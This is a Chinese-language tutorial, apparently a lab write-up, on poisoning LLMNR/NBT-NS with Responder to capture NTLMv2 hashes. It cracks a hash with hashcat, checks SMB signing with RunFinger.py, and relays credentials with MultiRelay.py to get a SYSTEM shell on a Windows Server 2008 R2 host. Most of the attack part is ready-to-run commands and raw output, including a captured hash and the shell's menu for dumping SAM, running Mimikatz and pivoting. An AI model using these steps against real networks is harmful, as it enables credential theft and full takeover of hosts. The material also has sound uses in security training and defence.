使用Responder获取ntlmv2 hash Responder配置下载 获取ntlmv2hash之后进行爆破获取ntlmv2使用hashcat爆破密码 中继获得shell参考文章
Responder配置 下载 https://github.com/lgandx/Responder
Responder工具可以污染LLMNR和NBT-NS请求。
在目录下的Responder.conf可以配置启用的模块
如果只需要获取ntlmv2hash使用默认配置即可,之后使用Hashcat进行暴力破解
如果要使用ntlm中继,需要对配置文件进行修改
获取ntlmv2hash之后进行爆破
kali自带了Hashcat,省去了安装的麻烦
在linux上解压好Responder后进入目录执行
获取ntlmv2 python Responder.py -I eth0
这里的eth0为监听的网卡,
经过本地测试域环境和工作组环境均可获得ntlmv2hash
获取之后会在./log下可以看到获取的记录
使用hashcat爆破密码 hashcat -m 5600 Administrator::TEST:2f1fd6519d27c804:35A20084194A2D444D5B5906CC393F7A:010100000000000059F7CBA1FF0FD701EF20F0B734BED7430000000002000800540045005300540001000400410044000400100074006500730074002E00780079007A0003001600610064002E0074006500730074002E00780079007A000500100074006500730074002E00780079007A000700080059F7CBA1FF0FD70106000400020000000800300030000000000000000000000000300000D005ED9DB38DCB10E70E4FEE54BFAB5FB02D082A9E1F9CE53FE6C28EF2D9CB8A0A0010000000000000000000000000000000000009001E0063006900660073002F007500730065007200310032003100330032003200000000000000000000000000 /root/1234.txt --force
这里的5600代表ntlmv2,为了更快的测试,这里使用几个密码进行测试
中继获得shell
使用这种方法的前提条件是没有开启smb签名验证,默认情况下只有域控使用了smb签名验证
开启方法可以参考
https://www.cnblogs.com/xiejn/p/13686620.html
配置Responder.conf
在./tools下有RunFinger.py和MultiRelay.py
使用RunFinger.py验证smb签名
python RunFinger.py -i 192.168.164.138 [root@localhost tools]# python RunFinger.py -i 192.168.164.138[SMB2]:['192.168.164.138', Os:'Windows 7/Server 2008R2', Build:'7601', Domain:'WIN-ORHR1E13JIO', Bootime: 'Last restart: 2021-03-03 17:08:46', Signing:'False', RDP:'True', SMB1:'Enabled']
使用MultiRelay.py进行中继
python3 MultiRelay.py -t 192.168.164.138 -u ALL
这里的ip应该一致,即被攻击的ip应该未开启smb签名验证
模拟使用smb服务
这里随便请求一个主机即可
[root@localhost tools]# python3 MultiRelay.py -t 192.168.164.138 -u ALLCrypto lib is not installed. You won't be able to live dump the hashes.You can install it on debian based os with this command: apt-get install python-cryptoThe Sam file will be saved anyway and you will have the bootkey.Responder MultiRelay 2.5 NTLMv1/2 RelaySend bugs/hugs/comments to: laurent.gaffie@gmail.comUsernames to relay (-u) are case sensitive.To kill this script hit CTRL-C./*Use this script in combination with Responder.py for best results.Make sure to set SMB and HTTP to OFF in Responder.conf.This tool listen on TCP port 80, 3128 and 445.For optimal pwnage, launch Responder only with these 2 options:-rvAvoid running a command that will likely prompt for information like net use, etc.If you do so, use taskkill (as system) to kill the process.*/Relaying credentials for these users:['ALL']Retrieving information for 192.168.164.138...SMB signing: FalseOs version: 'Windows Server 2008 R2 Datacenter 7601 Service Pack 1'Hostname: 'WIN-ORHR1E13JIO'Part of the 'WORKGROUP' domain[+] Setting up SMB relay with SMB challenge: 9707c4caa56863f4[+] Received NTLMv2 hash from: 192.168.164.139 [+] Client info: ['Windows Server 2008 R2 Datacenter 7601 Service Pack 1', domain: 'WORKGROUP', signing:'False'][+] Username: Administrator is whitelisted, forwarding credentials.[+] SMB Session Auth sent.[+] Looks good, Administrator has admin rights on C$.[+] Authenticated.[+] Dropping into Responder's interactive shell, type "exit" to terminateAvailable commands:dump -> Extract the SAM database and print hashes.regdump KEY -> Dump an HKLM registry key (eg: regdump SYSTEM)read Path_To_File -> Read a file (eg: read /windows/win.ini)get Path_To_File -> Download a file (eg: get users/administrator/desktop/password.txt)delete Path_To_File-> Delete a file (eg: delete /windows/temp/executable.exe)upload Path_To_File-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in windowstemprunas Command -> Run a command as the currently logged in user. (eg: runas whoami)scan /24 -> Scan (Using SMB) this /24 or /16 to find hosts to pivot topivot IP address -> Connect to another host (eg: pivot 10.0.0.12)mimi command -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)mimi32 command -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)lcmd command -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)help -> Print this message.exit -> Exit this shell and return in relay mode. If you want to quit type exit and then use CTRL-CAny other command than that will be run as SYSTEM on the target.Connected to 192.168.164.138 as LocalSystem.C:Windowssystem32:#
成功获得shell
不过在本地复现时,在域环境下的机器无法被中继成功,检查时发现也无法通过正常的登录方法来登录smb服务,从新克隆一台机器未加入域环境可以使用,可能是我的虚拟机异常
参考文章
https://xz.aliyun.com/t/3560